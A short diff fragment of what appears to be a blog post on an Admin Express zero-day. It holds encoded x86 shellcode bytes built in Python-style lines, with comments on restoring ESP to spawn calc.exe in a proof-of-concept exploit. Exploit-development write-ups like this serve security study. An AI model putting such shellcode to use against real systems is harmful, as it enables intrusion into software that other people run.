deveshm/connormcgarr.github.io/_posts/2019-05-13-Admin-Express-0day.md

 shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
 shellcode += "\x50" # push eax

 # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe.
-Since it is a call to the Win32 API,
-# we need the ESP value before execution.
+# We need the ESP value before execution.
 We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!).
 # Here are the 3 values: 403F2711 3F3F2711 3F3F2811
 move = zero
 move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711